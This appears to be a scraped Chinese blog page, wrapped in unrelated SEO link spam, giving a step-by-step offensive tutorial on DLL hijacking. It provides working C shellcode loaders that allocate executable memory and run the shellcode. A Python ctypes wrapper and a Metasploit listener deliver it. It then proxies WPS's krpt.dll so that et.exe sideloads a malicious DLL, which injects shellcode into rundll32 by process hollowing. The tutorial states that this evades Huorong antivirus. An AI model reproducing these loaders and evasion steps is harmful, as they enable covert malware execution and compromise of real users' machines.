当前位置: 首页 > news >正文

做网站卖房写标题网页动态效果

做网站卖房写标题,网页动态效果,旅行网站开发,建设网站用英文怎么说CPy-DLL劫持-语言-调用加载 1.使用visual studio创建项目 2.将文件名重命名为.c后缀 3.将如下加载器代码生成dll文件 加载器代码#xff1a; #include pch.h #include Windows.h #include stdio.h #include string.h#pragma comment… CPy-DLL劫持-语言-调用加载 1.使用visual studio创建项目 2.将文件名重命名为.c后缀 3.将如下加载器代码生成dll文件 加载器代码 #include pch.h #include Windows.h #include stdio.h #include string.h#pragma comment(linker,/subsystem:\Windows\ /entry:\mainCRTStartup\) //windows控制台程序不出黑窗口unsigned char buf[] 生成的shellcode; int main() { char* Memory; Memory VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memcpy(Memory, buf, sizeof(buf)); ((void(*)())Memory)(); } 生成成功 4.msf开启监听 5.使用python执行如下代码调用dll文件 dll.py from ctypes import * #利用python载入dll文件 libCDLL(生成的dll文件路径) #调用dll文件内置方法函数 lib.main() 执行成功msf成功上线 6.使用打包器将dll.py文件打包成exe执行成功上线   CC-DLL劫持-白加黑-导出编译 1.随便选中一个exe程序运行使用火绒剑查看这个exe程序在运行时加载的dll文件 这里选择的是wps中的et.exe程序运行发现加载了一个krpt.dll文件 2.使用Dependencies工具对krpt.dll进行反编译 3.右键导出krpt.dll源码 4.使用visual studio 创建一个新项目。项目名称右键——打开项目位置——将反编译的dll源码复制进去。 5.选中dll源码拖入项目工具就会自动加载源码 6.打开asm文件将所有的jmp语句删除 7.根据文件中的教程选中文件——右键属性——如下图修改——点击应用。 配置时注意 配置选择所有配置 平台选择所有平台 8.根据教程——继续打开asm文件的属性进行配置 9.项目名称——右键属性——c/c——代码生成——运行库——多线程(/MT) 10.预编译头——不使用预编译头 11.链接器——调试——生成调试信息——否 12.在.c文件中添加如下一行代码 13.打开.cpp文件写入shellcode加载代码(可任意) 如 #include framework.h #include krpt.h #include windows.hBOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: {unsigned char hexData[] 生成的shellcode;char* v7A (char*)VirtualAlloc(0, _countof(hexData), 0x3000u, 0x40u); memcpy((void*)v7A, hexData, _countof(hexData)); struct _PROCESS_INFORMATION ProcessInformation; struct _STARTUPINFOA StartupInfo; void* v24; CONTEXT Context; DWORD DwWrite 0; memset(StartupInfo, 0, sizeof(StartupInfo)); StartupInfo.cb 68; BOOL result CreateProcessA(0, (LPSTR)rundll32.exe, 0, 0, 0, 0x44u, 0, 0, StartupInfo, ProcessInformation); if (result) { Context.ContextFlags 65539; GetThreadContext(ProcessInformation.hThread, Context); v24 VirtualAllocEx(ProcessInformation.hProcess, 0, _countof(hexData), 0x1000u, 0x40u); WriteProcessMemory(ProcessInformation.hProcess, v24, v7A, _countof(hexData), DwWrite); Context.Eip (DWORD)v24; SetThreadContext(ProcessInformation.hThread, Context); ResumeThread(ProcessInformation.hThread); CloseHandle(ProcessInformation.hThread); result CloseHandle(ProcessInformation.hProcess); }TerminateProcess(GetCurrentProcess(), 0); };case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } 成功生成dll文件 14.将生成的dll文件改名位krpt.dll和et.exe一起上传到目标系统 运行et.exe成功绕过火绒检测msf成功上线
http://www.hkea.cn/news/14435606/

相关文章:

  • 六安市城乡和建设局官方网站互联网营销师考试内容
  • 学院网站建设策划书wordpress 显示标签代码
  • 做微网站需要什么国内精美网站
  • 自己做的网站添加交费功能南通网站建设方案服务
  • 亚马逊官方网站怎么做vue网页模板免费
  • 做网站需要什么设备受欢迎的模板网站建设
  • 怎么给网站搭建后台app应用网站html5模板
  • 网站在哪里搜索wordpress 前台多余代码
  • 万网域名管理网站右翼网站
  • 国学大师网站是哪里做的网站下载的网页修改下面版权所有
  • 网站开发图片加载过慢如何优化xampp 查看wordpress模板
  • 合肥网站建设公司加盟代理网页在线
  • 四川住房和城乡建设部网站官网房地产网站开发
  • 佛山用户网站建设建立网站要钱吗?
  • 优良网站it外包公司为什么不能去
  • 张家界网站制作公司重庆专业网站开发服务
  • 深圳住房和建设局网站登录界面seo免费优化工具
  • 国外做免费的视频网站火车头wordpress发布模块制作
  • 泉州自助建站杭州专业的网站制作公司
  • 刚做的网站怎么在百度上能搜到网站服务器容量
  • 开发大型网站的最主流语言网站看不到预览图
  • 网站后台管理器怎么做响应式网站建设报价单
  • 建个普通网站多少钱wordpress会员vip插件
  • 青岛网站定制电商网站建设合同模板
  • 高端网站建设文案自学做网站可以吗
  • 北京高端定制网站建设专业企业网站制作怎么做
  • 快速搭建网站框架图电商网站搭建
  • 爱站网工具包网页教程网站
  • 苏州代做淘宝网站北京 顺义 网站制作
  • 把网站扒下来以后怎么做拓者网室内设计官网app